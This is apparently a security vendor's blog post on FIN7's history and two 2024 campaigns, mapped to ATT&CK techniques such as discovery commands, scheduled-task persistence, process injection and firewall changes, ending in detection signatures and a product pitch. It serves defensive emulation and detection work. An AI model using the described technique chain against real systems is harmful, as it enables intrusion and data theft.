FIN7, also known as Carbon Spider, is a highly sophisticated and financially motivated criminal adversary that began its operations in 2013 by targeting Russian financial institutions. In late 2015, FIN7 expanded its targeting profile to include the Middle East, Europe, and North America, primarily in pursuit of payment card data. The group has been observed leveraging Point-of-Sale (PoS) malware to harvest card data, which was subsequently monetized by selling the stolen information on credit card markets such as Joker’s Stash.

At the beginning of 2020, FIN7 broadened its operational scope to engage in Big Game Hunting (BGH) activities. To this end, the group began employing the REvil ransomware before developing its proprietary ransomware, DarkSide. In November of the same year, FIN7 launched an affiliate program which offered DarkSide under the Ransomware-as-a-Service (RaaS) business model in exchange for a share of the profits generated from successful attacks.

Following a successful infection of Colonial Pipeline in May 2021, the attack disrupted critical fuel supply chains across the southeastern United States, leading to widespread panic buying and temporary fuel shortages. This incident drew significant attention from law enforcement and regulatory bodies forcing the abrupt cessation of DarkSide operations. Shortly thereafter, in July 2021, FIN7 introduced a new RaaS offering called BlackMatter, which remained active until November 2021.

The group has targeted a wide range of sectors, including financial services, hospitality, retail, healthcare and life sciences, technology, transportation, manufacturing, media, professional services, and energy, resources & utilities.

AttackIQ has released two new attack graphs that emulate the behaviors exhibited by the Russian adversary FIN7 during 2024 to help customers validate their security controls and their ability to defend against this threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new assessment templates in the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against a long-standing financially motivated adversary.
• Assess their security posture against an adversary that has recently engaged in ransomware activities.
• Continuously validate detection and prevention pipelines against a highly sophisticated adversary active worldwide.

FIN7 – 2024-04 – MSIX Application Installers lead to NetSupport RAT Deployment

In April 2024, eSentire’s Threat Response Unit (TRU) identified activities conducted by the financially motivated adversary FIN7 involving the use of malicious websites to impersonate well-known brands. These websites, promoted through sponsored Google Ads, prompted users to download a fake browser extension through a pop-up. Instead, the download delivered a Windows App Installer (MSIX) file, which was subsequently used to deploy the NetSupport Remote Access Trojan (RAT).

Initial Access & Discovery – Malware Delivery and Local System Discovery

This stage begins with the deployment of a Windows App Installer (MSIX) file and continues with the delivery of a PowerShell script contained within it, which collects system information and the names of installed security products.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

System Information Discovery (T1082): This scenario executes the win32_OperatingSystem WMI class to obtain the Operating System information

System Information Discovery (T1082): This scenario executes the Get-WmiObject Win32_ComputerSystem PowerShell command to obtain detailed information pertaining to the compromised host.

Security Software Discovery (T1518.001): This scenario executes the AntiVirusProduct WMI class to determine which software has been installed.

Command and Control – Payload Deployment

At this stage, the NetSupport Remote Access Trojan (RAT) is deployed, enabling the adversary to establish a remote connection to the compromised system. Subsequently, the CSVDE command-line tool is deployed, which allows the import and export of Active Directory data. Next, a ZIP file is deployed, containing within it a Python executable (EXE) and a Python (PY) payload.

Persistence & Command and Control – Final Payload Delivery

This stage begins with the retrieval of the User Principal Name (UPN) of the currently logged-in user using the whoami command. Then persistence is acquired through the creation of a scheduled task named “Updater”. The stage concludes with the deployment of DiceLoader, a Remote Access Trojan (RAT) developed in .NET.

System Owner/User Discovery (T1033): This scenario executes the native whoami /upn command to obtain the User Principal Name (UPN) of the running user account.

Scheduled Task/Job: Scheduled Task (T1053.005): This scenario acquires persistence through the creation of a new scheduled task named “Updater” using the schtasks utility.

Process Injection (T1055): This scenario injects arbitrary code into the memory space of a remote process using the LoadLibrary and CreateRemoteThread method.

FIN7 – 2024-04 – Spear Phishing and Typosquatting Leads to POWERTRASH Deployment

At the end of 2023, BlackBerry researchers identified a phishing campaign, led by the financially motivated adversary FIN7, targeting a large automotive manufacturer based in the United States. During this activity, the adversary employed spearphishing emails offering a false IP scanning utility that, once executed, deploys a backdoor that guarantees an initial foothold within the targeted network. To ensure success, FIN7 identified employees within the company’s IT department who possessed higher levels of administrative privileges.

Initial Access & Execution – Payload Delivery

This stage focuses on the deployment of the initial payload, beginning with a malicious executable disguised as an Advanced IP Scanner. This executable is used to deploy a secondary executable containing a multi-stage execution chain.

As part of this chain, several files are deployed, including jutil.dll, mspdf.dll, and audio.wav, which is then executed through the EnumWindows function.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Process Injection (T1055): This scenario allocates memory to the current process using VirtualAlloc, injects arbitrary code into the memory space, changes the memory protection using VirtualProtect and executes the shellcode using EnumWindows.

Execution & Discovery – Environment Reconnaissance

At this stage, POWERTRASH, an in-memory dropper written in PowerShell designed to execute an embedded payload directly in memory, is deployed. The stage then gathers information about the compromised system, including its timezone, active processes, and domain administrator accounts.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell’s -encodedCommand parameter.

System Time Discovery (T1124): The scenario identifies the time and time zone of the compromised system through the net time command.

Process Discovery (T1057): This scenario uses the Window’s built-in tasklist command to discover running processes.

Account Discovery: Domain Account (T1087.002): This scenario uses the net group command to list Domain and Enterprise Admins accounts.

Persistence & Command and Control – Secure Shell (SSH) Communication

This stage begins with the use of the icacls utility to modify file permissions, ensuring continued access to generated SSH keys, and establishes persistence through the creation of a scheduled task. Finally, a modification to the local firewall is performed using PowerShell, allowing communication via Secure Shell (SSH).

Windows File and Directory Permissions Modification (T1222.001): This scenario uses the icalcs.exe utility to modify file permissions to grant explicit Full (F) rights on a generated temporary file.

Scheduled Task/Job: Scheduled Task (T1053.005): This scenario acquires persistence through the creation of a new scheduled task named “Microsoft\Windows\System” using the schtasks utility.

Impair Defenses: Disable or Modify System Firewall (T1562.004): The scenario will use the New-NetFirewallRule PowerShell function to create a new rule into the Windows System Firewall to allow outbound traffic.

Remote Services: SSH (T1021.004): This scenario will initiate an SSH connection to an external AttackIQ-hosted server to exercise restrictions in outbound traffic.

Discovery – Local Environment Discovery

This stage focuses on gathering additional information about the local system, such as the hostname, username, available accounts, and active processes.

System Information Discovery (T1082): This scenario executes the native hostname to get the compromised host’s computer name.

System Owner/User Discovery (T1033): This scenario executes the native whoami command to obtain details of the running user account.

Account Discovery (T1087): This scenario executes the net user command to obtain a list of accounts known to the compromised host.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

• M1031 – Network Intrusion Prevention

2. Scheduled Task/Job: Scheduled Task (T1053.005)

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly from the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.

2a. Detection

With an EDR or SIEM Platform, you can detect the following commands being issued to schedule a malicious task.

Process Name = (“cmd.exe” OR “Powershell.exe”)
Command Line CONTAINS (“schtasks” AND “/CREATE” AND (“cmd” OR “powershell”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Scheduled Task

 3. Process Injection (T1055):

Malware will commonly inject malicious code into legitimate running processes to attempt to blend in with legitimate applications to remain hidden and appear normal to the compromised system.

3a. Detection

Searching for common processes that are performing uncommon actions can help identify when a process has been compromised.

3b. Mitigation

MITRE ATT&CK recommends the following mitigation recommendations:

Wrap-up

In summary, these attack graphs will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by the FIN7 adversary. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.